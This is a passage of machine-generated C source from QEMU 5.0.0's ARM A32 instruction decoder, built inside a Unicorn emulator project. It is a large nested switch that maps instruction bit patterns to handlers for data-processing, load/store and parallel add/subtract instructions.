/mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:326 */ disas_a32_extract_ldst_ri8_p1w(ctx, &u.f_ldst_ri, insn); if (trans_LDRSH_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; } return false; } return false; case 0x1: /* ....001. ........ ........ ........ */ switch ((insn >> 21) & 0xf) { case 0x0: /* ....0010 000..... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:120 */ disas_a32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_AND_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0x1: /* ....0010 001..... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:121 */ disas_a32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_EOR_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0x2: /* ....0010 010..... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:122 */ disas_a32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_SUB_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0x3: /* ....0010 011..... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:123 */ disas_a32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_RSB_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0x4: /* ....0010 100..... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:124 */ disas_a32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_ADD_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0x5: /* ....0010 101..... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:125 */ disas_a32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_ADC_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0x6: /* ....0010 110..... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:126 */ disas_a32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_SBC_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0x7: /* ....0010 111..... ........ ........ 
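   (data-processing with a rotated 8-bit immediate; the s_rri_rot
    extractor doubles the 4-bit rotate field via times_2())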
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:127 */ disas_a32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_RSC_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0x8: /* ....0011 000..... ........ ........ */ switch ((insn >> 20) & 0x1) { case 0x0: /* ....0011 0000.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:80 */ disas_a32_extract_mov16(ctx, &u.f_ri, insn); if (trans_MOVW(ctx, &u.f_ri)) return true; return false; case 0x1: /* ....0011 0001.... ........ ........ */ disas_a32_extract_S_xri_rot(ctx, &u.f_s_rri_rot, insn); switch ((insn >> 12) & 0xf) { case 0x0: /* ....0011 0001.... 0000.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:128 */ if (trans_TST_xri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; } return false; case 0x9: /* ....0011 001..... ........ ........ */ switch (insn & 0x0010f000) { case 0x0000f000: /* ....0011 0010.... 1111.... ........ */ if ((insn & 0x000f0000) == 0x00000000) { /* ....0011 00100000 1111.... ........ */ if ((insn & 0x000000ff) == 0x00000001) { /* ....0011 00100000 1111.... 00000001 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:188 */ disas_a32_extract_disas_a32_Fmt_16(ctx, &u.f_empty, insn); if (trans_YIELD(ctx, &u.f_empty)) return true; } if ((insn & 0x000000ff) == 0x00000002) { /* ....0011 00100000 1111.... 00000010 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:189 */ disas_a32_extract_disas_a32_Fmt_16(ctx, &u.f_empty, insn); if (trans_WFE(ctx, &u.f_empty)) return true; } if ((insn & 0x000000ff) == 0x00000003) { /* ....0011 00100000 1111.... 00000011 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:190 */ disas_a32_extract_disas_a32_Fmt_16(ctx, &u.f_empty, insn); if (trans_WFI(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:198 */ disas_a32_extract_disas_a32_Fmt_16(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:201 */ disas_a32_extract_msr_i(ctx, &u.f_msr_i, insn); u.f_msr_i.r = 0; if (trans_MSR_imm(ctx, &u.f_msr_i)) return true; return false; case 0x00100000: /* ....0011 0011.... 0000.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:129 */ disas_a32_extract_S_xri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_TEQ_xri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; case 0xa: /* ....0011 010..... ........ ........ */ switch ((insn >> 20) & 0x1) { case 0x0: /* ....0011 0100.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:81 */ disas_a32_extract_mov16(ctx, &u.f_ri, insn); if (trans_MOVT(ctx, &u.f_ri)) return true; return false; case 0x1: /* ....0011 0101.... ........ ........ */ disas_a32_extract_S_xri_rot(ctx, &u.f_s_rri_rot, insn); switch ((insn >> 12) & 0xf) { case 0x0: /* ....0011 0101.... 0000.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:130 */ if (trans_CMP_xri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; } return false; case 0xb: /* ....0011 011..... ........ ........ 
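   (immediate MSR versus the flag-setting compare forms: MSR requires
    insn[15:12] == 1111, while TST/TEQ/CMP/CMN require it to be 0000)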
*/ switch (insn & 0x0010f000) { case 0x0000f000: /* ....0011 0110.... 1111.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:203 */ disas_a32_extract_msr_i(ctx, &u.f_msr_i, insn); u.f_msr_i.r = 1; if (trans_MSR_imm(ctx, &u.f_msr_i)) return true; return false; case 0x00100000: /* ....0011 0111.... 0000.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:131 */ disas_a32_extract_S_xri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_CMN_xri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; case 0xc: /* ....0011 100..... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:132 */ disas_a32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_ORR_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0xd: /* ....0011 101..... ........ ........ */ disas_a32_extract_s_rxi_rot(ctx, &u.f_s_rri_rot, insn); switch ((insn >> 16) & 0xf) { case 0x0: /* ....0011 101.0000 ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:133 */ if (trans_MOV_rxi(ctx, &u.f_s_rri_rot)) return true; return false; } return false; case 0xe: /* ....0011 110..... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:134 */ disas_a32_extract_s_rri_rot(ctx, &u.f_s_rri_rot, insn); if (trans_BIC_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0xf: /* ....0011 111..... ........ ........ */ disas_a32_extract_s_rxi_rot(ctx, &u.f_s_rri_rot, insn); switch ((insn >> 16) & 0xf) { case 0x0: /* ....0011 111.0000 ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:135 */ if (trans_MVN_rxi(ctx, &u.f_s_rri_rot)) return true; return false; } return false; } return false; case 0x2: /* ....010. ........ ........ ........ */ switch (insn & 0x01500000) { case 0x00000000: /* ....0100 .0.0.... ........ ........ */ switch ((insn >> 21) & 0x1) { case 0x0: /* ....0100 .000.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:344 */ disas_a32_extract_ldst_ri12_pw0(ctx, &u.f_ldst_ri, insn); if (trans_STR_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x1: /* ....0100 .010.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:355 */ disas_a32_extract_ldst_ri12_p0w1(ctx, &u.f_ldst_ri, insn); if (trans_STRT_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x00100000: /* ....0100 .0.1.... ........ ........ */ switch ((insn >> 21) & 0x1) { case 0x0: /* ....0100 .001.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:349 */ disas_a32_extract_ldst_ri12_pw0(ctx, &u.f_ldst_ri, insn); if (trans_LDR_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x1: /* ....0100 .011.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:357 */ disas_a32_extract_ldst_ri12_p0w1(ctx, &u.f_ldst_ri, insn); if (trans_LDRT_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x00400000: /* ....0100 .1.0.... ........ ........ */ switch ((insn >> 21) & 0x1) { case 0x0: /* ....0100 .100.... ........ ........ 
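   (word/byte load/store with a 12-bit immediate offset; the
    _pw0/_p0w1/_p1w suffix of the chosen extractor selects the
    addressing mode, cf. the field extractors above)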
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:346 */ disas_a32_extract_ldst_ri12_pw0(ctx, &u.f_ldst_ri, insn); if (trans_STRB_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x1: /* ....0100 .110.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:356 */ disas_a32_extract_ldst_ri12_p0w1(ctx, &u.f_ldst_ri, insn); if (trans_STRBT_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x00500000: /* ....0100 .1.1.... ........ ........ */ switch ((insn >> 21) & 0x1) { case 0x0: /* ....0100 .101.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:351 */ disas_a32_extract_ldst_ri12_pw0(ctx, &u.f_ldst_ri, insn); if (trans_LDRB_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x1: /* ....0100 .111.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:358 */ disas_a32_extract_ldst_ri12_p0w1(ctx, &u.f_ldst_ri, insn); if (trans_LDRBT_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x01000000: /* ....0101 .0.0.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:343 */ disas_a32_extract_ldst_ri12_p1w(ctx, &u.f_ldst_ri, insn); if (trans_STR_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x01100000: /* ....0101 .0.1.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:348 */ disas_a32_extract_ldst_ri12_p1w(ctx, &u.f_ldst_ri, insn); if (trans_LDR_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x01400000: /* ....0101 .1.0.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:345 */ disas_a32_extract_ldst_ri12_p1w(ctx, &u.f_ldst_ri, insn); if (trans_STRB_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x01500000: /* ....0101 .1.1.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:350 */ disas_a32_extract_ldst_ri12_p1w(ctx, &u.f_ldst_ri, insn); if (trans_LDRB_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x3: /* ....011. ........ ........ ........ */ switch (insn & 0x01400010) { case 0x00000000: /* ....0110 .0...... ........ ...0.... */ switch ((insn >> 20) & 0x3) { case 0x0: /* ....0110 .000.... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:284 */ disas_a32_extract_ldst_rs_pw0(ctx, &u.f_ldst_rr, insn); if (trans_STR_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x1: /* ....0110 .001.... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:289 */ disas_a32_extract_ldst_rs_pw0(ctx, &u.f_ldst_rr, insn); if (trans_LDR_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x2: /* ....0110 .010.... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:297 */ disas_a32_extract_ldst_rs_p0w1(ctx, &u.f_ldst_rr, insn); if (trans_STRT_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x3: /* ....0110 .011.... ........ ...0.... 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:299 */ disas_a32_extract_ldst_rs_p0w1(ctx, &u.f_ldst_rr, insn); if (trans_LDRT_rr(ctx, &u.f_ldst_rr)) return true; return false; } return false; case 0x00000010: /* ....0110 .0...... ........ ...1.... */ switch (insn & 0x00a00020) { case 0x00000000: /* ....0110 000..... ........ ..01.... */ disas_a32_extract_rndm(ctx, &u.f_rrr, insn); switch (insn & 0x00100fc0) { case 0x00100f00: /* ....0110 0001.... ....1111 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:426 */ if (trans_SADD16(ctx, &u.f_rrr)) return true; return false; case 0x00100f40: /* ....0110 0001.... ....1111 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:428 */ if (trans_SSAX(ctx, &u.f_rrr)) return true; return false; case 0x00100f80: /* ....0110 0001.... ....1111 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:430 */ if (trans_SADD8(ctx, &u.f_rrr)) return true; return false; } return false; case 0x00000020: /* ....0110 000..... ........ ..11.... */ disas_a32_extract_rndm(ctx, &u.f_rrr, insn); switch (insn & 0x00100fc0) { case 0x00100f00: /* ....0110 0001.... ....1111 0011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:427 */ if (trans_SASX(ctx, &u.f_rrr)) return true; return false; case 0x00100f40: /* ....0110 0001.... ....1111 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:429 */ if (trans_SSUB16(ctx, &u.f_rrr)) return true; return false; case 0x00100fc0: /* ....0110 0001.... ....1111 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:431 */ if (trans_SSUB8(ctx, &u.f_rrr)) return true; return false; } return false; case 0x00200000: /* ....0110 001..... ........ ..01.... */ disas_a32_extract_rndm(ctx, &u.f_rrr, insn); switch (insn & 0x00100fc0) { case 0x00000f00: /* ....0110 0010.... ....1111 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:433 */ if (trans_QADD16(ctx, &u.f_rrr)) return true; return false; case 0x00000f40: /* ....0110 0010.... ....1111 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:435 */ if (trans_QSAX(ctx, &u.f_rrr)) return true; return false; case 0x00000f80: /* ....0110 0010.... ....1111 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:437 */ if (trans_QADD8(ctx, &u.f_rrr)) return true; return false; case 0x00100f00: /* ....0110 0011.... ....1111 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:440 */ if (trans_SHADD16(ctx, &u.f_rrr)) return true; return false; case 0x00100f40: /* ....0110 0011.... ....1111 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:442 */ if (trans_SHSAX(ctx, &u.f_rrr)) return true; return false; case 0x00100f80: /* ....0110 0011.... ....1111 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:444 */ if (trans_SHADD8(ctx, &u.f_rrr)) return true; return false; } return false; case 0x00200020: /* ....0110 001..... ........ ..11.... */ disas_a32_extract_rndm(ctx, &u.f_rrr, insn); switch (insn & 0x00100fc0) { case 0x00000f00: /* ....0110 0010.... ....1111 0011.... 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:434 */ if (trans_QASX(ctx, &u.f_rrr)) return true; return false; case 0x00000f40: /* ....0110 0010.... ....1111 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:436 */ if (trans_QSUB16(ctx, &u.f_rrr)) return true; return false; case 0x00000fc0: /* ....0110 0010.... ....1111 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:438 */ if (trans_QSUB8(ctx, &u.f_rrr)) return true; return false; case 0x00100f00: /* ....0110 0011.... ....1111 0011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:441 */ if (trans_SHASX(ctx, &u.f_rrr)) return true; return false; case 0x00100f40: /* ....0110 0011.... ....1111 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:443 */ if (trans_SHSUB16(ctx, &u.f_rrr)) return true; return false; case 0x00100fc0: /* ....0110 0011.... ....1111 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:445 */ if (trans_SHSUB8(ctx, &u.f_rrr)) return true; return false; } return false; case 0x00800000: /* ....0110 100..... ........ ..01.... */ disas_a32_extract_disas_a32_Fmt_43(ctx, &u.f_pkh, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* ....0110 1000.... ........ ..01.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:470 */ if (trans_PKH(ctx, &u.f_pkh)) return true; return false; } return false; case 0x00800020: /* ....0110 100..... ........ ..11.... */ switch (insn & 0x001003c0) { case 0x00000040: /* ....0110 1000.... ......00 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:484 */ disas_a32_extract_rrr_rot(ctx, &u.f_rrr_rot, insn); if (trans_SXTAB16(ctx, &u.f_rrr_rot)) return true; return false; case 0x00000380: /* ....0110 1000.... ......11 1011.... */ disas_a32_extract_rndm(ctx, &u.f_rrr, insn); switch ((insn >> 10) & 0x3) { case 0x3: /* ....0110 1000.... ....1111 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:491 */ if (trans_SEL(ctx, &u.f_rrr)) return true; return false; } return false; } return false; case 0x00a00000: /* ....0110 101..... ........ ..01.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:476 */ disas_a32_extract_sat(ctx, &u.f_sat, insn); if (trans_SSAT(ctx, &u.f_sat)) return true; return false; case 0x00a00020: /* ....0110 101..... ........ ..11.... */ switch (insn & 0x001003c0) { case 0x00000040: /* ....0110 1010.... ......00 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:485 */ disas_a32_extract_rrr_rot(ctx, &u.f_rrr_rot, insn); if (trans_SXTAB(ctx, &u.f_rrr_rot)) return true; return false; case 0x00000300: /* ....0110 1010.... ......11 0011.... */ disas_a32_extract_sat16(ctx, &u.f_sat, insn); switch ((insn >> 10) & 0x3) { case 0x3: /* ....0110 1010.... ....1111 0011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:479 */ if (trans_SSAT16(ctx, &u.f_sat)) return true; return false; } return false; case 0x00100040: /* ....0110 1011.... ......00 0111.... 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:486 */ disas_a32_extract_rrr_rot(ctx, &u.f_rrr_rot, insn); if (trans_SXTAH(ctx, &u.f_rrr_rot)) return true; return false; case 0x00100300: /* ....0110 1011.... ......11 0011.... */ disas_a32_extract_rdm(ctx, &u.f_rr, insn); switch (insn & 0x000f0c00) { case 0x000f0c00: /* ....0110 10111111 ....1111 0011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:492 */ if (trans_REV(ctx, &u.f_rr)) return true; return false; } return false; case 0x00100380: /* ....0110 1011.... ......11 1011.... */ disas_a32_extract_rdm(ctx, &u.f_rr, insn); switch (insn & 0x000f0c00) { case 0x000f0c00: /* ....0110 10111111 ....1111 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:493 */ if (trans_REV16(ctx, &u.f_rr)) return true; return false; } return false; } return false; } return false; case 0x00400000: /* ....0110 .1...... ........ ...0.... */ switch ((insn >> 20) & 0x3) { case 0x0: /* ....0110 .100.... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:286 */ disas_a32_extract_ldst_rs_pw0(ctx, &u.f_ldst_rr, insn); if (trans_STRB_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x1: /* ....0110 .101.... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:291 */ disas_a32_extract_ldst_rs_pw0(ctx, &u.f_ldst_rr, insn); if (trans_LDRB_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x2: /* ....0110 .110.... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:298 */ disas_a32_extract_ldst_rs_p0w1(ctx, &u.f_ldst_rr, insn); if (trans_STRBT_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x3: /* ....0110 .111.... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:300 */ disas_a32_extract_ldst_rs_p0w1(ctx, &u.f_ldst_rr, insn); if (trans_LDRBT_rr(ctx, &u.f_ldst_rr)) return true; return false; } return false; case 0x00400010: /* ....0110 .1...... ........ ...1.... */ switch (insn & 0x00a00020) { case 0x00000000: /* ....0110 010..... ........ ..01.... */ disas_a32_extract_rndm(ctx, &u.f_rrr, insn); switch (insn & 0x00100fc0) { case 0x00100f00: /* ....0110 0101.... ....1111 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:447 */ if (trans_UADD16(ctx, &u.f_rrr)) return true; return false; case 0x00100f40: /* ....0110 0101.... ....1111 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:449 */ if (trans_USAX(ctx, &u.f_rrr)) return true; return false; case 0x00100f80: /* ....0110 0101.... ....1111 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:451 */ if (trans_UADD8(ctx, &u.f_rrr)) return true; return false; } return false; case 0x00000020: /* ....0110 010..... ........ ..11.... */ disas_a32_extract_rndm(ctx, &u.f_rrr, insn); switch (insn & 0x00100fc0) { case 0x00100f00: /* ....0110 0101.... ....1111 0011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:448 */ if (trans_UASX(ctx, &u.f_rrr)) return true; return false; case 0x00100f40: /* ....0110 0101.... ....1111 0111.... 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:450 */ if (trans_USUB16(ctx, &u.f_rrr)) return true; return false; case 0x00100fc0: /* ....0110 0101.... ....1111 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:452 */ if (trans_USUB8(ctx, &u.f_rrr)) return true; return false; } return false; case 0x00200000: /* ....0110 011..... ........ ..01.... */ disas_a32_extract_rndm(ctx, &u.f_rrr, insn); switch (insn & 0x00100fc0) { case 0x00000f00: /* ....0110 0110.... ....1111 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:454 */ if (trans_UQADD16(ctx, &u.f_rrr)) return true; return false; case 0x00000f40: /* ....0110 0110.... ....1111 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:456 */ if (trans_UQSAX(ctx, &u.f_rrr)) return true; return false; case 0x00000f80: /* ....0110 0110.... ....1111 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:458 */ if (trans_UQADD8(ctx, &u.f_rrr)) return true; return false; case 0x00100f00: /* ....0110 0111.... ....1111 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:461 */ if (trans_UHADD16(ctx, &u.f_rrr)) return true; return false; case 0x00100f40: /* ....0110 0111.... ....1111 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:463 */ if (trans_UHSAX(ctx, &u.f_rrr)) return true; return false; case 0x00100f80: /* ....0110 0111.... ....1111 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:465 */ if (trans_UHADD8(ctx, &u.f_rrr)) return true; return false; } return false; case 0x00200020: /* ....0110 011..... ........ ..11.... */ disas_a32_extract_rndm(ctx, &u.f_rrr, insn); switch (insn & 0x00100fc0) { case 0x00000f00: /* ....0110 0110.... ....1111 0011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:455 */ if (trans_UQASX(ctx, &u.f_rrr)) return true; return false; case 0x00000f40: /* ....0110 0110.... ....1111 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:457 */ if (trans_UQSUB16(ctx, &u.f_rrr)) return true; return false; case 0x00000fc0: /* ....0110 0110.... ....1111 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:459 */ if (trans_UQSUB8(ctx, &u.f_rrr)) return true; return false; case 0x00100f00: /* ....0110 0111.... ....1111 0011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:462 */ if (trans_UHASX(ctx, &u.f_rrr)) return true; return false; case 0x00100f40: /* ....0110 0111.... ....1111 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:464 */ if (trans_UHSUB16(ctx, &u.f_rrr)) return true; return false; case 0x00100fc0: /* ....0110 0111.... ....1111 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:466 */ if (trans_UHSUB8(ctx, 